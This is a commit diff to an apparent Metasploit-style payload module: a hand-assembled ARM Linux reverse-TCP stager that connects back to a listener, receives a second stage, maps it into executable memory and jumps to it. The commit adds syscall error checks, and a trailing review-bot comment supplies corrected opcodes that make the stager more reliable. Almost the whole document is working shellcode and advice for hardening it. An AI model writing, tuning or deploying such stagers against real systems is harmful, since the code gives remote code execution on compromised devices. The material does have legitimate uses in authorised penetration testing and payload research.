
Commit 1862900

committed
add error handling
1 parent 17d7bb0 commit 1862900


1 file changed

+26
-8
lines changed


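--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -34,56 +34,74 @@ def initialize(info = {})
 {
 'Offsets' =>
 {
-'LPORT' => [ 182, 'n' ],
-'LHOST' => [ 184, 'ADDR' ],
+'LPORT' => [ 242, 'n' ],
+'LHOST' => [ 244, 'ADDR' ],
 },
 'Payload' =>
 [
-0xe59f70b4, # ldr r7, [pc, #180] ; set 281(0x119) to r7
+0xe59f70f0, # ldr r7, [pc, #240] ; set 281(0x119) to r7
 0xe3a00002, # mov r0, #2
 0xe3a01001, # mov r1, #1
 0xe3a02006, # mov r2, #6
 0xef000000, # svc 0x00000000 ; invoke socket
+0xe3500000, # cmp r0, #0
+0xba000031, # blt 817c <failed>
 0xe1a0c000, # mov ip, r0
 0xe2877002, # add r7, r7, #2 ; set 283(0x11b) to r7
-0xe28f1090, # add r1, pc, #144 ; set 0x0a1a0002 to r1
+0xe28f10c4, # add r1, pc, #196 ; set first .word addr to r1
 0xe3a02010, # mov r2, #16
 0xef000000, # svc 0x00000000 ; invoke connect
+0xe3500000, # cmp r0, #0
+0xba00002a, # blt 817c <failed>
 0xe1a0000c, # mov r0, ip
 0xe24dd004, # sub sp, sp, #4
 0xe2877008, # add r7, r7, #8 ; set 291(0x123) to r7
 0xe1a0100d, # mov r1, sp
 0xe3a02004, # mov r2, #4
 0xe3a03000, # mov r3, #0
 0xef000000, # svc 0x00000000 ; invoke recv
+0xe3500000, # cmp r0, #0
+0xba000021, # blt 817c <failed>
 0xe59d1000, # ldr r1, [sp]
-0xe59f3070, # ldr r3, [pc, #112] ; set 0xfffff000 to r3
+0xe59f3094, # ldr r3, [pc, #148] ; set 0xfffff000 to r3
 0xe0011003, # and r1, r1, r3
 0xe3a02001, # mov r2, #1
 0xe1a02602, # lsl r2, r2, #12
 0xe0811002, # add r1, r1, r2 ; set 0x1000 to r1
 0xe3a070c0, # mov r7, #192 ; set 192(0xC0) to r7
 0xe3e00000, # mvn r0, #0 ; set 0xffffffff to r0
 0xe3a02007, # mov r2, #7
-0xe59f3054, # ldr r3, [pc, #84] ; set 0x1022 to r3
+0xe59f3078, # ldr r3, [pc, #120] ; set r3 to 0x1022
 0xe1a04000, # mov r4, r0
 0xe3a05000, # mov r5, #0
 0xef000000, # svc 0x00000000 ; invoke mmap2
+0xe3500000, # cmp r0, #0
+0xba000012, # blt 817c <failed>
 0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7
 0xe1a01000, # mov r1, r0
 0xe1a0000c, # mov r0, ip
 0xe3a03000, # mov r3, #0
-0xe59d2000, # loop: ldr r2, [sp]
+# loop:
+0xe59d2000, # ldr r2, [sp]
 0xe2422ffa, # sub r2, r2, #1000
 0xe58d2000, # str r2, [sp]
 0xe3520000, # cmp r2, #0
 0xda000002, # ble 80fc <last>
 0xe3a02ffa, # mov r2, #1000
 0xef000000, # svc 0x00000000 ; invoke recv
+0xe3500000, # cmp r0, #0
+0xba000005, # blt 817c <failed>
 0xeafffff7, # b 80dc <loop>
-0xe2822ffa, # last: add r2, r2, #1000
+# last:
+0xe2822ffa, # add r2, r2, #1000
 0xef000000, # svc 0x00000000 ; invoke recv
+0xe3500000, # cmp r0, #0
+0xba000000, # blt 817c <failed>
 0xe1a0f001, # mov pc, r1
+# failed:
+0xe3a07001, # mov r7, #1
+0xe3a00001, # mov r0, #1
+0xef000000, # svc 0x00000000
 0x5c110002, # .word 0x5c110002
 0x0100007f, # .word 0x0100007f
 0x00000119, # .word 0x00000119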
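Review bot: The `cmp r0, #0` / `blt 817c <failed>` pair added after the mmap2 svc treats any result with the top bit set as an error, but the ARM Linux syscall convention only reserves -4095..-1 (0xfffff001..0xffffffff) for errors, and on 32-bit ARM anonymous mappings are commonly handed out above 0x80000000, so a successful mmap2 would branch to `failed` and the stager would exit before fetching the stage; the libc-style check is `0xe3700a01, # cmn r0, #4096` followed by `0x8a000012, # bhi 817c <failed>` (same offset, cond HI), which branches only for the error range. The three recv checks have the opposite gap: `blt` accepts a 0-byte return, which is the peer closing the socket, so a connection dropped mid-stage still falls through to `mov pc, r1` and executes a partially filled buffer; switching those three branches to cond LE (`0xda000021`, `0xda000005`, `0xda000000`, offsets unchanged) sends a 0-byte recv to `failed` as well. The socket and connect checks are correct as written, since 0 is a valid fd and the success value respectively. The `svc` in the `failed` block is the only uncommented syscall in the listing; `; invoke exit` would match the rest. The enclosing `initialize` and the close of the `'Payload'` array lie outside the hunk.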
